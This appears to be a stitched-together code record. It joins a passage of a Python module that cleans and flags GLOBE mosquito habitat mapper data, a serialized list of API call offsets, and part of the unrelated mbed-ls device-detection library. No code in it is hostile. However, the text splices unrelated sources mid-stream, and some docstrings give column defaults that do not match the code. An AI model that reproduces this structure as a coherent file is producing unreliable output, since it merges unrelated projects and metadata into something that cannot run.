The name of the column which will store the generated HasGenus flag
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the HasGenus flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
df[bit_col] = (~pd.isna(df[genus_col].to_numpy())).astype(int)
if not inplace:
return df
def infectious_genus_flag(
df, genus_col="mhm_Genus", bit_col="mhm_IsGenusOfInterest", inplace=False
):
"""
Creates a bit flag: `mhm_IsGenusOfInterest` where 1 denotes a Genus of a infectious mosquito and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
genus_col : str, default="mhm_Genus"
The name of the column in the mosquito habitat mapper DataFrame that contains the genus records.
bit_col : str, default="mhm_HasGenus"
The name of the column which will store the generated IsGenusOfInterest flag
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the IsGenusOfInterest flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
infectious_genus_flag = np.vectorize(
lambda genus: genus in ["Aedes", "Anopheles", "Culex"]
)
df[bit_col] = infectious_genus_flag(df[genus_col].to_numpy()).astype(int)
if not inplace:
return df
def is_container_flag(
df,
watersource_col="mhm_WaterSourceType",
bit_col="mhm_IsWaterSourceContainer",
inplace=False,
):
"""
Creates a bit flag: `mhm_IsWaterSourceContainer` where 1 denotes if a watersource is a container (e.g. ovitrap, pots, tires, etc.) and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
watersource_col : str, default="mhm_WaterSourceType"
The name of the column in the mosquito habitat mapper DataFrame that contains the watersource type records.
bit_col : str, default="mhm_IsWaterSourceContainer"
The name of the column which will store the generated IsWaterSourceContainer flag
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the IsContainer flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
mark_containers = np.vectorize(lambda container: "container" in container)
df[bit_col] = mark_containers(df[watersource_col].to_numpy()).astype(int)
if not inplace:
return df
def has_watersource_flag(
df, watersource_col="mhm_WaterSource", bit_col="mhm_HasWaterSource", inplace=False
):
"""
Creates a bit flag: `mhm_HasWaterSource` where 1 denotes if there is a watersource and 0 denotes the contrary.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
watersource_col : str, default="mhm_WaterSource"
The name of the column in the mosquito habitat mapper DataFrame that contains the watersource records.
bit_col : str, default="mhm_IsWaterSourceContainer"
The name of the column which will store the generated HasWaterSource flag
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the HasWaterSource flag. If `inplace=True` it returns None.
"""
if not inplace:
df = df.copy()
has_watersource = np.vectorize(lambda watersource: int(not pd.isna(watersource)))
df[bit_col] = has_watersource(df[watersource_col].to_numpy())
if not inplace:
return df
def photo_bit_flags(
df,
watersource_photos="mhm_WaterSourcePhotoUrls",
larvae_photos="mhm_LarvaFullBodyPhotoUrls",
abdomen_photos="mhm_AbdomenCloseupPhotoUrls",
photo_count="mhm_PhotoCount",
rejected_count="mhm_RejectedCount",
pending_count="mhm_PendingCount",
photo_bit_binary="mhm_PhotoBitBinary",
photo_bit_decimal="mhm_PhotoBitDecimal",
inplace=False,
):
"""
Creates the following flags:
- `PhotoCount`: The number of valid photos per record.
- `RejectedCount`: The number of photos that were rejected per record.
- `PendingCount`: The number of photos that are pending approval per record.
- `PhotoBitBinary`: A string that represents the presence of a photo in the order of watersource, larvae, and abdomen. For example, if the entry is `110`, that indicates that there is a water source photo and a larvae photo, but no abdomen photo.
- `PhotoBitDecimal`: The numerical representation of the mhm_PhotoBitBinary string.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame
watersource_photos : str, default="mhm_WaterSourcePhotoUrls"
The name of the column in the mosquito habitat mapper DataFrame that contains the watersource photo url records.
larvae_photos : str, default="mhm_LarvaFullBodyPhotoUrls"
The name of the column in the mosquito habitat mapper DataFrame that contains the larvae photo url records.
abdomen_photos : str, default="mhm_AbdomenCloseupPhotoUrls"
The name of the column in the mosquito habitat mapper DataFrame that contains the abdomen photo url records.
photo_count : str, default="mhm_PhotoCount"
The name of the column that will store the PhotoCount flag.
rejected_count : str, default="mhm_RejectedCount"
The name of the column that will store the RejectedCount flag.
pending_count : str, default="mhm_PendingCount"
The name of the column that will store the PendingCount flag.
photo_bit_binary : str, default="mhm_PhotoBitBinary"
The name of the column that will store the PhotoBitBinary flag.
photo_bit_decimal : str, default="mhm_PhotoBitDecimal"
The name of the column that will store the PhotoBitDecimal flag.
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with the photo flags. If `inplace=True` it returns None.
"""
def pic_data(*args):
pic_count = 0
rejected_count = 0
pending_count = 0
valid_photo_bit_mask = ""
# bit_power = len(args) - 1
# For url string -- if we see ANY http, add 1
# also count all valid photos, rejected photos,
# If there are NO http then add 0, to empty photo field
for url_string in args:
if not pd.isna(url_string):
if "http" not in url_string:
valid_photo_bit_mask += "0"
else:
valid_photo_bit_mask += "1"
pic_count += url_string.count("http")
pending_count += url_string.count("pending")
rejected_count += url_string.count("rejected")
else:
valid_photo_bit_mask += "0"
return (
pic_count,
rejected_count,
pending_count,
valid_photo_bit_mask,
int(valid_photo_bit_mask, 2),
)
if not inplace:
df = df.copy()
get_photo_data = np.vectorize(pic_data)
(
df[photo_count],
df[rejected_count],
df[pending_count],
df[photo_bit_binary],
df[photo_bit_decimal],
) = get_photo_data(
df[watersource_photos].to_numpy(),
df[larvae_photos].to_numpy(),
df[abdomen_photos].to_numpy(),
)
if not inplace:
return df
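# Illustrative reading of the flags produced above (the record values are made
# up): a PhotoBitBinary of "110" (PhotoBitDecimal 6) means watersource and
# larvae photos are present but no abdomen photo, so
#   bool(6 & 4) -> True   (watersource)
#   bool(6 & 2) -> True   (larvae)
#   bool(6 & 1) -> False  (abdomen)
# which is the same bit layout photo_subjects() relies on further below.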
def completion_score_flag(
df,
photo_bit_binary="mhm_PhotoBitBinary",
has_genus="mhm_HasGenus",
sub_completeness="mhm_SubCompletenessScore",
completeness="mhm_CumulativeCompletenessScore",
inplace=False,
):
"""
    Adds the following completeness score flags:
- `SubCompletenessScore`: The percentage of the watersource photos, larvae photos, abdomen photos, and genus columns that are filled out.
- `CumulativeCompletenessScore`: The percentage of non null values out of all the columns.
Parameters
----------
df : pd.DataFrame
A mosquito habitat mapper DataFrame with the [`PhotoBitDecimal`](#photo_bit_flags) and [`HasGenus`](#has_genus_flags) flags.
photo_bit_binary: str, default="mhm_PhotoBitBinary"
The name of the column in the mosquito habitat mapper DataFrame that contains the PhotoBitBinary flag.
    has_genus : str, default="mhm_HasGenus"
        The name of the column in the mosquito habitat mapper DataFrame that contains the HasGenus flag.
    sub_completeness : str, default="mhm_SubCompletenessScore"
        The name of the column in the mosquito habitat mapper DataFrame that will contain the generated SubCompletenessScore flag.
    completeness : str, default="mhm_CumulativeCompletenessScore"
        The name of the column in the mosquito habitat mapper DataFrame that will contain the generated CumulativeCompletenessScore flag.
inplace : bool, default=False
        Whether to return a new DataFrame. If True, no DataFrame copy is returned and the operation is performed in place.
Returns
-------
pd.DataFrame
A DataFrame with completion score flags. If `inplace=True` it returns None.
"""
def sum_bit_mask(bit_mask="0"):
total = 0.0
for char in bit_mask:
total += int(char)
return total
if not inplace:
df = df.copy()
scores = {}
scores["sub_score"] = []
# Cummulative Completion Score
scores["cumulative_score"] = round(df.count(axis=1) / len(df.columns), 2)
# Sub-Score
for index in df.index:
bit_mask = df[photo_bit_binary][index]
sub_score = df[has_genus][index] + sum_bit_mask(bit_mask=bit_mask)
sub_score /= 4.0
scores["sub_score"].append(sub_score)
df[sub_completeness], df[completeness] = (
scores["sub_score"],
scores["cumulative_score"],
)
if not inplace:
return df
def apply_cleanup(mhm_df):
"""Applies a full cleanup procedure to the mosquito habitat mapper data. Only returns a copy.
It follows the following steps:
- Removes Homogenous Columns
- Renames Latitude and Longitudes
- Cleans the Column Naming
- Converts Larvae Count to Numbers
- Rounds Columns
- Standardizes Null Values
Parameters
----------
mhm_df : pd.DataFrame
A DataFrame containing **raw** Mosquito Habitat Mapper Data from the API.
Returns
-------
pd.DataFrame
A DataFrame containing the cleaned up Mosquito Habitat Mapper Data
"""
mhm_df = mhm_df.copy()
rename_latlon_cols(mhm_df, inplace=True)
cleanup_column_prefix(mhm_df, inplace=True)
larvae_to_num(mhm_df, inplace=True)
round_cols(mhm_df, inplace=True)
standardize_null_vals(mhm_df, inplace=True)
return mhm_df
def add_flags(mhm_df):
"""Adds the following flags to the Mosquito Habitat Mapper Data:
- Has Genus
- Is Infectious Genus/Genus of Interest
- Is Container
- Has WaterSource
- Photo Bit Flags
- Completion Score Flag
This returns a copy of the original DataFrame with the flags added onto it.
Parameters
----------
mhm_df : pd.DataFrame
A DataFrame containing cleaned up Mosquito Habitat Mapper Data ideally from the method.
Returns
-------
pd.DataFrame
A DataFrame containing the flagged Mosquito Habitat Mapper Data
"""
mhm_df = mhm_df.copy()
has_genus_flag(mhm_df, inplace=True)
infectious_genus_flag(mhm_df, inplace=True)
is_container_flag(mhm_df, inplace=True)
has_watersource_flag(mhm_df, inplace=True)
photo_bit_flags(mhm_df, inplace=True)
completion_score_flag(mhm_df, inplace=True)
return mhm_df
def plot_valid_entries(df, bit_col, entry_type):
"""
Plots the number of entries with photos and the number of entries without photos
Parameters
----------
df : pd.DataFrame
The DataFrame containing Mosquito Habitat Mapper Data with the PhotoBitDecimal Flag.
"""
plt.figure()
num_valid = len(df[df[bit_col] > 0])
plt.title(f"Entries with {entry_type} vs No {entry_type}")
plt.ylabel("Number of Entries")
plt.bar(entry_type, num_valid, color="#e34a33")
plt.bar(f"No {entry_type}", len(df) - num_valid, color="#fdcc8a")
def photo_subjects(mhm_df):
"""
Plots the amount of photos for each photo area (Larvae, Abdomen, Watersource)
Parameters
----------
mhm_df : pd.DataFrame
The DataFrame containing Mosquito Habitat Mapper Data with the PhotoBitDecimal Flag.
"""
total_dict = {"Larvae Photos": 0, "Abdomen Photos": 0, "Watersource Photos": 0}
for number in mhm_df["mhm_PhotoBitDecimal"]:
total_dict["Watersource Photos"] += number & 4
total_dict["Larvae Photos"] += number & 2
total_dict["Abdomen Photos"] += number & 1
for key in total_dict.keys():
if total_dict[key] != 0:
total_dict[key] = math.log10(total_dict[key])
else:
total_dict[key] = 0
plt.figure(figsize=(10, 5))
plt.title("Mosquito Habitat Mapper - Photo Subject Frequencies (Log Scale)")
plt.xlabel("Photo Type")
plt.ylabel("Frequency (Log Scale)")
plt.bar(total_dict.keys(), total_dict.values(), color="lightblue")
def diagnostic_plots(mhm_df):
"""
Generates (but doesn't display) diagnostic plots to gain insight into the current data.
Plots:
- Larvae Count Distribution (where a negative entry denotes null data)
- Photo Subject Distribution
- Number of valid photos vs no photos
- Completeness Score Distribution
- Subcompleteness Score Distribution
Parameters
----------
mhm_df : pd.DataFrame
The DataFrame containing Flagged and Cleaned Mosquito Habitat Mapper Data.
"""
plot_int_distribution(mhm_df, "mhm_LarvaeCount", "Larvae Count")
photo_subjects(mhm_df)
plot_freq_bar(mhm_df, "Mosquito Habitat Mapper", "mhm_Genus", "Genus Types")
plot_valid_entries(mhm_df, "mhm_HasGenus", "Genus Classifications")
plot_valid_entries(mhm_df, "mhm_PhotoBitDecimal", "Valid Photos")
completeness_histogram(
mhm_df,
"Mosquito Habitat Mapper",
"mhm_CumulativeCompletenessScore",
"Cumulative Completeness",
)
completeness_histogram(
mhm_df,
"Mosquito Habitat Mapper",
"mhm_SubCompletenessScore",
"Sub Completeness",
)
def qa_filter(
mhm_df,
has_genus=False,
min_larvae_count=-9999,
has_photos=False,
is_container=False,
):
"""
Can filter a cleaned and flagged mosquito habitat mapper DataFrame based on the following criteria:
- `Has Genus`: If the entry has an identified genus
- `Min Larvae Count` : Minimum larvae count needed for an entry
- `Has Photos` : If the entry contains valid photo entries
- `Is Container` : If the entry's watersource was a container
Returns a copy of the DataFrame
Parameters
----------
has_genus : bool, default=False
If True, only entries with an identified genus will be returned.
min_larvae_count : int, default=-9999
Only entries with a larvae count greater than or equal to this parameter will be included.
has_photos : bool, default=False
If True, only entries with recorded photos will be returned
is_container : bool, default=False
If True, only entries with containers will be returned
Returns
-------
pd.DataFrame
A DataFrame of the applied filters.
"""
mhm_df = mhm_df[mhm_df["mhm_LarvaeCount"] >= min_larvae_count]
if has_genus:
mhm_df = mhm_df[mhm_df["mhm_HasGenus"] == 1]
if has_photos:
mhm_df = mhm_df[mhm_df["mhm_PhotoBitDecimal"] > 0]
if is_container:
mhm_df = mhm_df[mhm_df["mhm_IsWaterSourceContainer"] == 1]
return mhm_df
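# Illustrative end-to-end usage, not part of the original module.  `raw_df` is
# assumed to be a raw mosquito habitat mapper DataFrame obtained elsewhere.
def _example_mhm_pipeline(raw_df):
    cleaned = apply_cleanup(raw_df)   # normalise columns, larvae counts and nulls
    flagged = add_flags(cleaned)      # add genus, photo and completeness flags
    return qa_filter(flagged, has_genus=True, min_larvae_count=1, has_photos=True)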
| [
"go_utils.plot.completeness_histogram",
"go_utils.plot.plot_int_distribution",
"matplotlib.pyplot.ylabel",
"go_utils.cleanup.round_cols",
"matplotlib.pyplot.xlabel",
"go_utils.cleanup.rename_latlon_cols",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.bar",
"re.sub",
"go_utils.cleanup.standardize_... | [((2550, 2624), 'go_utils.cleanup.replace_column_prefix', 'replace_column_prefix', (['df', '"""mosquitohabitatmapper"""', '"""mhm"""'], {'inplace': 'inplace'}), "(df, 'mosquitohabitatmapper', 'mhm', inplace=inplace)\n", (2571, 2624), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((4754, 4781), 'numpy.vectorize', 'np.vectorize', (['_entry_to_num'], {}), '(_entry_to_num)\n', (4766, 4781), True, 'import numpy as np\n'), ((6970, 7038), 'numpy.vectorize', 'np.vectorize', (["(lambda genus: genus in ['Aedes', 'Anopheles', 'Culex'])"], {}), "(lambda genus: genus in ['Aedes', 'Anopheles', 'Culex'])\n", (6982, 7038), True, 'import numpy as np\n'), ((8261, 8317), 'numpy.vectorize', 'np.vectorize', (["(lambda container: 'container' in container)"], {}), "(lambda container: 'container' in container)\n", (8273, 8317), True, 'import numpy as np\n'), ((13235, 13257), 'numpy.vectorize', 'np.vectorize', (['pic_data'], {}), '(pic_data)\n', (13247, 13257), True, 'import numpy as np\n'), ((16539, 16579), 'go_utils.cleanup.rename_latlon_cols', 'rename_latlon_cols', (['mhm_df'], {'inplace': '(True)'}), '(mhm_df, inplace=True)\n', (16557, 16579), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((16672, 16704), 'go_utils.cleanup.round_cols', 'round_cols', (['mhm_df'], {'inplace': '(True)'}), '(mhm_df, inplace=True)\n', (16682, 16704), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((16709, 16752), 'go_utils.cleanup.standardize_null_vals', 'standardize_null_vals', (['mhm_df'], {'inplace': '(True)'}), '(mhm_df, inplace=True)\n', (16730, 16752), False, 'from go_utils.cleanup import rename_latlon_cols, replace_column_prefix, round_cols, standardize_null_vals\n'), ((17989, 18001), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (17999, 18001), True, 'import matplotlib.pyplot as plt\n'), ((18047, 18105), 'matplotlib.pyplot.title', 'plt.title', (['f"""Entries with {entry_type} vs No {entry_type}"""'], {}), "(f'Entries with {entry_type} vs No {entry_type}')\n", (18056, 18105), True, 'import matplotlib.pyplot as plt\n'), ((18110, 18141), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of Entries"""'], {}), "('Number of Entries')\n", (18120, 18141), True, 'import matplotlib.pyplot as plt\n'), ((18146, 18193), 'matplotlib.pyplot.bar', 'plt.bar', (['entry_type', 'num_valid'], {'color': '"""#e34a33"""'}), "(entry_type, num_valid, color='#e34a33')\n", (18153, 18193), True, 'import matplotlib.pyplot as plt\n'), ((19009, 19036), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 5)'}), '(figsize=(10, 5))\n', (19019, 19036), True, 'import matplotlib.pyplot as plt\n'), ((19041, 19117), 'matplotlib.pyplot.title', 'plt.title', (['"""Mosquito Habitat Mapper - Photo Subject Frequencies (Log Scale)"""'], {}), "('Mosquito Habitat Mapper - Photo Subject Frequencies (Log Scale)')\n", (19050, 19117), True, 'import matplotlib.pyplot as plt\n'), ((19122, 19146), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Photo Type"""'], {}), "('Photo Type')\n", (19132, 19146), True, 'import matplotlib.pyplot as plt\n'), ((19151, 19186), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Frequency (Log Scale)"""'], {}), "('Frequency (Log Scale)')\n", (19161, 19186), True, 'import matplotlib.pyplot as plt\n'), ((19783, 19847), 'go_utils.plot.plot_int_distribution', 
'plot_int_distribution', (['mhm_df', '"""mhm_LarvaeCount"""', '"""Larvae Count"""'], {}), "(mhm_df, 'mhm_LarvaeCount', 'Larvae Count')\n", (19804, 19847), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((19879, 19955), 'go_utils.plot.plot_freq_bar', 'plot_freq_bar', (['mhm_df', '"""Mosquito Habitat Mapper"""', '"""mhm_Genus"""', '"""Genus Types"""'], {}), "(mhm_df, 'Mosquito Habitat Mapper', 'mhm_Genus', 'Genus Types')\n", (19892, 19955), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((20102, 20225), 'go_utils.plot.completeness_histogram', 'completeness_histogram', (['mhm_df', '"""Mosquito Habitat Mapper"""', '"""mhm_CumulativeCompletenessScore"""', '"""Cumulative Completeness"""'], {}), "(mhm_df, 'Mosquito Habitat Mapper',\n 'mhm_CumulativeCompletenessScore', 'Cumulative Completeness')\n", (20124, 20225), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((20265, 20374), 'go_utils.plot.completeness_histogram', 'completeness_histogram', (['mhm_df', '"""Mosquito Habitat Mapper"""', '"""mhm_SubCompletenessScore"""', '"""Sub Completeness"""'], {}), "(mhm_df, 'Mosquito Habitat Mapper',\n 'mhm_SubCompletenessScore', 'Sub Completeness')\n", (20287, 20374), False, 'from go_utils.plot import completeness_histogram, plot_freq_bar, plot_int_distribution\n'), ((2739, 2753), 'pandas.isna', 'pd.isna', (['entry'], {}), '(entry)\n', (2746, 2753), True, 'import pandas as pd\n'), ((18931, 18958), 'math.log10', 'math.log10', (['total_dict[key]'], {}), '(total_dict[key])\n', (18941, 18958), False, 'import math\n'), ((4618, 4632), 'pandas.isna', 'pd.isna', (['count'], {}), '(count)\n', (4625, 4632), True, 'import pandas as pd\n'), ((12562, 12581), 'pandas.isna', 'pd.isna', (['url_string'], {}), '(url_string)\n', (12569, 12581), True, 'import pandas as pd\n'), ((2979, 3003), 're.sub', 're.sub', (['"""-.*"""', '""""""', 'entry'], {}), "('-.*', '', entry)\n", (2985, 3003), False, 'import re\n'), ((9482, 9502), 'pandas.isna', 'pd.isna', (['watersource'], {}), '(watersource)\n', (9489, 9502), True, 'import pandas as pd\n')] |
"""
mbed SDK
Copyright (c) 2011-2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import os
import sys
import functools
from os.path import expanduser
from io import open
import json
from os import listdir
from os.path import isfile, join, exists, isdir
import logging
from abc import ABCMeta, abstractmethod
from .platform_database import PlatformDatabase, LOCAL_PLATFORM_DATABASE, \
LOCAL_MOCKS_DATABASE
mbedls_root_logger = logging.getLogger("mbedls")
mbedls_root_logger.setLevel(logging.WARNING)
logger = logging.getLogger("mbedls.lstools_base")
logger.addHandler(logging.NullHandler())
def deprecated(reason):
"""Deprecate a function/method with a decorator"""
def actual_decorator(func):
@functools.wraps(func)
def new_func(*args, **kwargs):
logger.warning("Call to deprecated function %s. %s",
func.__name__, reason)
return func(*args, **kwargs)
return new_func
return actual_decorator
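# Illustrative usage sketch (not part of the original module): the decorator above
# wraps a callable and logs through the 'mbedls.lstools_base' logger on every call,
# e.g.
#
#     @deprecated("Use 'list_mbeds' instead.")
#     def old_helper():
#         return 42
#
# old_helper() still returns 42 but also emits a "Call to deprecated function" warning.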
class FSInteraction(object):
BeforeFilter = 1
AfterFilter = 2
Never = 3
class MbedLsToolsBase(object):
""" Base class for mbed-lstools, defines mbed-ls tools interface for
    mbed-enabled device detection on various hosts
"""
__metaclass__ = ABCMeta
# Which OSs are supported by this module
# Note: more than one OS can be supported by mbed-lstools_* module
os_supported = []
# Directory where we will store global (OS user specific mocking)
HOME_DIR = expanduser("~")
MOCK_FILE_NAME = '.mbedls-mock'
RETARGET_FILE_NAME = 'mbedls.json'
DETAILS_TXT_NAME = 'DETAILS.TXT'
MBED_HTM_NAME = 'mbed.htm'
VENDOR_ID_DEVICE_TYPE_MAP = {
'0483': 'stlink',
'0d28': 'daplink',
'1366': 'jlink',
'03eb': 'atmel'
}
def __init__(self, list_unmounted=False, **kwargs):
""" ctor
"""
self.retarget_data = {} # Used to retarget mbed-enabled platform properties
platform_dbs = []
if isfile(self.MOCK_FILE_NAME) or ("force_mock" in kwargs and kwargs['force_mock']):
platform_dbs.append(self.MOCK_FILE_NAME)
elif isfile(LOCAL_MOCKS_DATABASE):
platform_dbs.append(LOCAL_MOCKS_DATABASE)
platform_dbs.append(LOCAL_PLATFORM_DATABASE)
self.plat_db = PlatformDatabase(platform_dbs,
primary_database=platform_dbs[0])
self.list_unmounted = list_unmounted
if 'skip_retarget' not in kwargs or not kwargs['skip_retarget']:
self.retarget()
@abstractmethod
def find_candidates(self):
"""Find all candidate devices connected to this computer
Note: Should not open any files
@return A dict with the keys 'mount_point', 'serial_port' and 'target_id_usb_id'
"""
        raise NotImplementedError
@deprecated("Functionality has been moved into 'list_mbeds'. "
"Please use list_mbeds with 'unique_names=True' and "
"'read_details_txt=True'")
def list_mbeds_ext(self):
"""! Function adds extra information for each mbed device
@return Returns list of mbed devices plus extended data like 'platform_name_unique'
@details Get information about mbeds with extended parameters/info included
"""
return self.list_mbeds(unique_names=True, read_details_txt=True)
def list_mbeds(
self, fs_interaction=FSInteraction.BeforeFilter,
filter_function=None, unique_names=False,
read_details_txt=False):
""" List details of connected devices
@return Returns list of structures with detailed info about each mbed
@param fs_interaction A member of the FSInteraction class that picks the
            trade-off between quality of service and speed
@param filter_function Function that is passed each mbed candidate,
should return True if it should be included in the result
Ex. mbeds = list_mbeds(filter_function=lambda m: m['platform_name'] == 'K64F')
@param unique_names A boolean controlling the presence of the
'platform_unique_name' member of the output dict
        @param read_details_txt A boolean controlling the presence of the
output dict attributes read from other files present on the 'mount_point'
@details Function returns list of dictionaries with mbed attributes 'mount_point', TargetID name etc.
Function returns mbed list with platform names if possible
"""
platform_count = {}
candidates = list(self.find_candidates())
logger.debug("Candidates for display %r", candidates)
result = []
for device in candidates:
device['device_type'] = self._detect_device_type(device)
if ((not device['mount_point'] or
not self.mount_point_ready(device['mount_point'])) and
not self.list_unmounted):
if (device['target_id_usb_id'] and device['serial_port']):
logger.warning(
"MBED with target id '%s' is connected, but not mounted. "
"Use the '-u' flag to include it in the list.",
device['target_id_usb_id'])
else:
platform_data = self.plat_db.get(device['target_id_usb_id'][0:4],
device_type=device['device_type'] or 'daplink', verbose_data=True)
device.update(platform_data or {"platform_name": None})
maybe_device = {
FSInteraction.BeforeFilter: self._fs_before_id_check,
FSInteraction.AfterFilter: self._fs_after_id_check,
FSInteraction.Never: self._fs_never
}[fs_interaction](device, filter_function, read_details_txt)
if maybe_device and (maybe_device['mount_point'] or self.list_unmounted):
if unique_names:
name = device['platform_name']
platform_count.setdefault(name, -1)
platform_count[name] += 1
device['platform_name_unique'] = (
"%s[%d]" % (name, platform_count[name]))
try:
device.update(self.retarget_data[device['target_id']])
logger.debug("retargeting %s with %r",
device['target_id'],
self.retarget_data[device['target_id']])
except KeyError:
pass
# This is done for API compatibility, would prefer for this to just be None
device['device_type'] = device['device_type'] if device['device_type'] else 'unknown'
result.append(maybe_device)
return result
def _fs_never(self, device, filter_function, read_details_txt):
"""Filter device without touching the file system of the device"""
device['target_id'] = device['target_id_usb_id']
device['target_id_mbed_htm'] = None
if not filter_function or filter_function(device):
return device
else:
return None
def _fs_before_id_check(self, device, filter_function, read_details_txt):
"""Filter device after touching the file system of the device.
Said another way: Touch the file system before filtering
"""
device['target_id'] = device['target_id_usb_id']
self._update_device_from_fs(device, read_details_txt)
if not filter_function or filter_function(device):
return device
else:
return None
def _fs_after_id_check(self, device, filter_function, read_details_txt):
"""Filter device before touching the file system of the device.
Said another way: Touch the file system after filtering
"""
device['target_id'] = device['target_id_usb_id']
device['target_id_mbed_htm'] = None
if not filter_function or filter_function(device):
self._update_device_from_fs(device, read_details_txt)
return device
else:
return None
def _update_device_from_fs(self, device, read_details_txt):
""" Updates the device information based on files from its 'mount_point'
@param device Dictionary containing device information
        @param read_details_txt A boolean controlling the presence of the
output dict attributes read from other files present on the 'mount_point'
"""
if not device.get('mount_point', None):
return
try:
directory_entries = os.listdir(device['mount_point'])
device['directory_entries'] = directory_entries
device['target_id'] = device['target_id_usb_id']
            # Always try to update using the daplink-compatible boards process.
# This is done for backwards compatibility.
self._update_device_details_daplink_compatible(device, read_details_txt)
if device.get('device_type') == 'jlink':
self._update_device_details_jlink(device, read_details_txt)
if device.get('device_type') == 'atmel':
self._update_device_details_atmel(device, read_details_txt)
except (OSError, IOError) as e:
logger.warning(
'Marking device with mount point "%s" as unmounted due to the '
'following error: %s', device['mount_point'], e)
device['mount_point'] = None
def _detect_device_type(self, device):
""" Returns a string of the device type
@param device Dictionary containing device information
@return Device type located in VENDOR_ID_DEVICE_TYPE_MAP or None if unknown
"""
return self.VENDOR_ID_DEVICE_TYPE_MAP.get(device.get('vendor_id'))
def _update_device_details_daplink_compatible(self, device, read_details_txt):
""" Updates the daplink-specific device information based on files from its 'mount_point'
@param device Dictionary containing device information
        @param read_details_txt A boolean controlling the presence of the
output dict attributes read from other files present on the 'mount_point'
"""
lowercase_directory_entries = [e.lower() for e in device['directory_entries']]
if self.MBED_HTM_NAME.lower() in lowercase_directory_entries:
self._update_device_from_htm(device)
elif not read_details_txt:
logger.debug('Since mbed.htm is not present, attempting to use '
'details.txt for the target id')
read_details_txt = True
if read_details_txt and self.DETAILS_TXT_NAME.lower() in lowercase_directory_entries:
details_txt = self._details_txt(device['mount_point']) or {}
device.update({"daplink_%s" % f.lower().replace(' ', '_'): v
for f, v in details_txt.items()})
# If details.txt contains the target id, this is the most trusted source
if device.get('daplink_unique_id', None):
device['target_id'] = device['daplink_unique_id']
if device['target_id']:
identifier = device['target_id'][0:4]
platform_data = self.plat_db.get(identifier,
device_type='daplink',
verbose_data=True)
if not platform_data:
logger.warning('daplink entry: "%s" not found in platform database', identifier)
else:
device.update(platform_data)
else:
device['platform_name'] = None
def _update_device_details_jlink(self, device, _):
""" Updates the jlink-specific device information based on files from its 'mount_point'
@param device Dictionary containing device information
"""
lower_case_map = {e.lower(): e for e in device['directory_entries']}
if 'board.html' in lower_case_map:
board_file_key = 'board.html'
elif 'user guide.html' in lower_case_map:
board_file_key = 'user guide.html'
else:
logger.warning('No valid file found to update JLink device details')
return
board_file_path = os.path.join(device['mount_point'], lower_case_map[board_file_key])
with open(board_file_path, 'r') as board_file:
board_file_lines = board_file.readlines()
for line in board_file_lines:
m = re.search(r'url=([\w\d\:\-/\\\?\.=-_]+)', line)
if m:
device['url'] = m.group(1).strip()
identifier = device['url'].split('/')[-1]
platform_data = self.plat_db.get(identifier,
device_type='jlink',
verbose_data=True)
if not platform_data:
logger.warning('jlink entry: "%s", not found in platform database', identifier)
else:
device.update(platform_data)
break
def _update_device_from_htm(self, device):
"""Set the 'target_id', 'target_id_mbed_htm', 'platform_name' and
'daplink_*' attributes by reading from mbed.htm on the device
"""
htm_target_id, daplink_info = self._read_htm_ids(device['mount_point'])
if daplink_info:
device.update({"daplink_%s" % f.lower().replace(' ', '_'): v
for f, v in daplink_info.items()})
if htm_target_id:
logger.debug("Found htm target id, %s, for usb target id %s",
htm_target_id, device['target_id_usb_id'])
device['target_id'] = htm_target_id
else:
logger.debug("Could not read htm on from usb id %s. "
"Falling back to usb id",
device['target_id_usb_id'])
device['target_id'] = device['target_id_usb_id']
device['target_id_mbed_htm'] = htm_target_id
def _update_device_details_atmel(self, device, _):
""" Updates the Atmel device information based on files from its 'mount_point'
@param device Dictionary containing device information
        @param read_details_txt A boolean controlling the presence of the
output dict attributes read from other files present on the 'mount_point'
"""
        # Atmel uses a system similar to DAPLink, but there's no details.txt with a target ID.
        # To identify the device we can use the serial, which is ATMLXXXXYYYYYYY,
        # where XXXX is the board identifier.
        # This can be verified by looking at readme.htm, which also uses the board ID to redirect to the platform page.
device['target_id'] = device['target_id_usb_id'][4:8]
platform_data = self.plat_db.get(device['target_id'],
device_type='atmel',
verbose_data=True)
device.update(platform_data or {"platform_name": None})
